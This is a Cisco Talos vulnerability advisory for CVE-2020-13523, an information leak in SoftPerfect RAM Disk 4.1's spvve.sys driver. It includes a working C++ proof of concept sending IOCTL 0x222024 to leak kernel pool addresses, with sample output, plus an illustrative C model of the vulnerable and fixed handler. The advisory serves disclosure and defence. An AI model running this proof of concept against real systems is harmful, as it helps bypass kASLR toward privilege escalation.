CVE-2020-13523: TALOS-2020-1122 || Cisco Talos Intelligence Group
Summary
An exploitable information disclosure vulnerability exists in SoftPerfect’s RAM Disk 4.1 spvve.sys driver. A specially crafted I/O request packet (IRP) can cause the disclosure of sensitive information. An attacker can send a malicious IRP to trigger this vulnerability.
Tested Versions
SoftPerfect RAM Disk 4.1
Product URLs
https://www.softperfect.com/products/ramdisk/
CVSSv3 Score
3.8 - CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N
CWE
CWE-200 - Information Exposure
Details
SoftPerfect RAM Disk is a high-performance RAM disk application that lets the user create a disk volume whose contents are stored in the computer's memory.
The spvve.sys driver creates a device object, \Device\SoftPerfectVolume, that is accessible to any user on the system, so any user who sends a specially crafted I/O request packet (IRP) can cause information disclosure (a leak of kernel pool memory addresses).
#include <windows.h>
#include <cstdio>
#include <iostream>

// OpenDeviceWorker() and neolib::hex_dump() are helper routines from the
// researcher's test harness; their bodies are not part of this advisory.
// The prototypes below are inferred from how main() calls them.
HANDLE OpenDeviceWorker(LPCWSTR deviceName, DWORD desiredAccess, const wchar_t** errmsg, BOOL nativeName);
namespace neolib { void hex_dump(const void* data, size_t length, std::ostream& out); }

int main()
{
    const wchar_t* errmsg = NULL;
    // native NT device name exposed by spvve.sys; no DACL keeps non-admin users out
    LPCWSTR deviceName = L"\\Device\\SoftPerfectVolume";
    HANDLE hDevice = OpenDeviceWorker(deviceName, GENERIC_READ | GENERIC_WRITE, &errmsg, TRUE);
    if (hDevice == INVALID_HANDLE_VALUE) {
        if (errmsg == NULL) {
            printf("error: something in OpenDeviceEx failed\n");
        }
        else {
            wprintf(L"error: %s\n", errmsg);
        }
        return 1;
    }
    const DWORD inBufferSize = 8;
    const DWORD outBufferSize = 16;
    PBYTE inBuffer = new BYTE[inBufferSize]();    // zero-initialised
    PBYTE outBuffer = new BYTE[outBufferSize]();  // zero-initialised so leaked bytes stand out
    DWORD returned = 0;
    // kernel pool memory address leak: the 16-byte reply carries pool pointers
    printf("DeviceIoControl IOCTL : 0x222024\n");
    DeviceIoControl(hDevice,
                    0x222024,
                    inBuffer,
                    inBufferSize,
                    outBuffer,
                    outBufferSize,
                    &returned,
                    NULL);
    neolib::hex_dump(outBuffer, outBufferSize, std::cout);
    delete[] inBuffer;
    delete[] outBuffer;
    CloseHandle(hDevice);
    return 0;
}
output:
C:\tmp\ramdisk>RamDiskMemLeak.exe
DeviceIoControl IOCTL : 0x222024
0000 : ....h....2...2.. D0 96 EA 00 68 92 EA 00 00 32 EA 00 00 32 EA 00
C:\tmp\ramdisk>RamDiskMemLeak.exe
DeviceIoControl IOCTL : 0x222024
0000 : h8O...O......0.. 68 38 4F 01 C0 00 4F 01 07 00 00 07 B0 30 00 00
C:\tmp\ramdisk>RamDiskMemLeak.exe
DeviceIoControl IOCTL : 0x222024
0000 : .!.............. A8 21 FD 00 C0 00 FD 00 00 00 00 00 00 00 00 00
This kind of vulnerability can allow an attacker to bypass the kASLR mitigation and opens the possibility of local privilege escalation when used in conjunction with another vulnerability.
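The three runs above return 16 bytes in which pointer-sized values change from run to run, which is what a reply built from a driver's internal, pool-allocated state looks like. The portable C program below is an added illustration, not Talos's proof of concept and not SoftPerfect's driver code: it models the general handler pattern behind such a leak and the handler-side fix. The context structure, its field names, the reply layout and the helper functions are hypothetical stand-ins chosen for the example and are not the internals of spvve.sys; heap allocations play the role of kernel pool memory so the program runs in user mode.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical per-volume context a driver keeps in the pool.  The two pointer
 * fields model pool addresses that must never be copied to user mode.
 * (Illustrative layout; not the spvve.sys structure.) */
typedef struct {
    void    *pool_self;      /* address of this allocation */
    void    *pool_next;      /* link to another pool allocation */
    uint32_t volume_flags;   /* fields a caller may legitimately read */
    uint32_t sector_size;
} volume_ctx_t;

/* Reply layout a user-mode caller is allowed to receive (hypothetical). */
typedef struct {
    uint32_t volume_flags;
    uint32_t sector_size;
    uint8_t  reserved[8];    /* padding: must be zeroed explicitly */
} volume_info_out_t;

/* Vulnerable pattern: the whole internal context is copied into the caller's
 * output buffer, so both pool pointers reach user mode.  Returns bytes written. */
size_t ioctl_get_info_vulnerable(const volume_ctx_t *ctx, uint8_t *out, size_t out_len)
{
    if (out_len < sizeof(*ctx))
        return 0;
    memcpy(out, ctx, sizeof(*ctx));
    return sizeof(*ctx);
}

/* Hardened pattern: check the output length, build the reply from permitted
 * fields only, zero the reply (including padding) before filling it, and
 * report exactly the number of bytes that carry data. */
size_t ioctl_get_info_hardened(const volume_ctx_t *ctx, uint8_t *out, size_t out_len)
{
    volume_info_out_t reply;
    if (out_len < sizeof(reply))
        return 0;                      /* STATUS_BUFFER_TOO_SMALL in a real driver */
    memset(&reply, 0, sizeof(reply));  /* no uninitialised bytes leave the handler */
    reply.volume_flags = ctx->volume_flags;
    reply.sector_size  = ctx->sector_size;
    memcpy(out, &reply, sizeof(reply));
    return sizeof(reply);
}

/* Review check: returns 1 if any pointer-sized window of the reply equals one
 * of the context's pool addresses, i.e. the reply leaks a pointer. */
int output_leaks_pointer(const volume_ctx_t *ctx, const uint8_t *out, size_t out_len)
{
    const void *secrets[2] = { ctx->pool_self, ctx->pool_next };
    for (size_t off = 0; off + sizeof(void *) <= out_len; off++) {
        void *p;
        memcpy(&p, out + off, sizeof(p));
        for (int i = 0; i < 2; i++)
            if (p != NULL && p == secrets[i])
                return 1;
    }
    return 0;
}

/* Constructed sample context: heap addresses stand in for pool addresses. */
volume_ctx_t *sample_ctx(void)
{
    volume_ctx_t *ctx = calloc(1, sizeof(*ctx));
    ctx->pool_self    = ctx;
    ctx->pool_next    = calloc(1, 64);
    ctx->volume_flags = 0x1;
    ctx->sector_size  = 512;
    return ctx;
}

void free_ctx(volume_ctx_t *ctx)
{
    free(ctx->pool_next);
    free(ctx);
}

int main(void)
{
    volume_ctx_t *ctx = sample_ctx();
    uint8_t out[32];
    size_t n = ioctl_get_info_vulnerable(ctx, out, sizeof(out));
    printf("vulnerable handler: %zu bytes, leaks pool pointer: %d\n",
           n, output_leaks_pointer(ctx, out, n));
    n = ioctl_get_info_hardened(ctx, out, sizeof(out));
    printf("hardened handler:   %zu bytes, leaks pool pointer: %d\n",
           n, output_leaks_pointer(ctx, out, n));
    free_ctx(ctx);
    return 0;
}
```

The check in output_leaks_pointer is the kind of assertion a driver test harness can run against every IOCTL reply: compare the bytes handed back to user mode against the addresses of the allocations the handler touched. The second half of the fix for the exposure described in the Details section, creating the device object with a security descriptor that denies non-administrators, is Windows-kernel-specific and is not modelled here.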
Timeline
2020-07-16 - Vendor Disclosure
2020-07-23 - Vendor Patched
2020-08-04 - Public Release
Discovered by a member of Cisco Talos.